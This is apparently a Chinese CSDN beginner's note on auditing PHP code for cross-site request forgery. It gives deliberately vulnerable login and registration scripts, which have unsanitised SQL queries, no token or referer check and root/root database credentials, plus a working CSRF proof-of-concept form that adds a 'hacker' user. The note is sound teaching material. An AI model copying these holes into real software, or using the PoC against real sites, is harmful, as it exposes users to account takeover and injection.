一個網絡安全小白在學習過程中記錄下的筆記,希望在CSDN能和大家一起成長,學習,分享,進步,下面分享的是代碼審計中跨站請求僞造,希望對入門代碼審計的朋友們有所幫助,大神有興趣看看即可,勿噴感謝,同時也歡迎各位師傅私聊交流學習。文章有所參考,也感謝教授我網安知識的師父們,感謝出生在這個互聯網時代,知識觸手可及。
CSRF
跨站請求僞造
原理:攻擊者在用戶未察覺的情況下憑藉用戶的身份向存在CSRF的網站發起惡意HTTP請求。
挖掘思路:
1、後臺管理,會員中心、用戶添加、資料修改等
2、被引用的文件沒有驗證token和referer
案例:
用戶登錄模塊login.html:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>用戶登錄</title>
</head>
<body>
<form action="login.php" method="post">
賬號:<input type="text" name="username"></br>
密碼:<input type="password" name="password"></br>
<input type="submit" value="點擊登錄" name="login">
</form>
</body>
</html>
動態腳本語言接收輸入的用戶名密碼並登錄login.php:
<?php
header("content-type:text/html;charset=utf-8");
if(!isset($_POST['login'])) {
exit('illegal access!');
}else{
$username = $_POST['username'];
$password = $_POST['password'];
include ('conn.php');
$sql = "SELECT * FROM user WHERE username='$username' and password='$password';";
$result = mysql_query($sql);
if($row = mysql_fetch_array($result)) {
session_start();
$_SESSION['username'] = $row['username'];
echo $_SESSION['username']. ",welcome!";
echo '<a href="reg.html">添加用戶</a>';
}
}
存在csrf的用戶註冊模塊reg.html:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>會員註冊</title>
</head>
<body>
<form action="reg.php" method="post">
用戶註冊<br >
用戶名:<input type="text" name="username"><br >
密碼:<input type="password" name="password"><br >
<input type="submit" name="submit" value="添加用戶">
</form>
</body>
</html>
動態腳本語言接收輸入的用戶名密碼並登錄reg.php:
<?php
header("content-type:text/html;charset=utf-8");
session_start();
if(!isset($_SESSION['username'])) {
echo '<script>alert("please login again!")</script>';
exit();
}else{
$username = $_POST['username'];
$password = $_POST['password'];
include ('conn.php');
$sql = "INSERT INTO csrf VALUES ($username,$password)";
$result = mysql_query($sql);
if($result) {
echo '<script>alert("register success!")</script>';
}else{
echo '<script>alert("register fail!")</script>';
}
}
數據庫連接文件conn.php:
<?php
$conn = mysql_connect("localhost","root","root");
mysql_select_db("csrf",$conn);
使用reg.html添加用戶時需要登錄,因爲reg.php會檢驗是否存在username的會話
我們在reg.html登錄並抓包構造好POC,csrf.html:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/reg.php" method="POST">
<input type="hidden" name="username" value="hacker" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="submit" value="�·»�Š �”¨�ˆ·" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
誘使用戶點擊csrf.html
流程示意圖: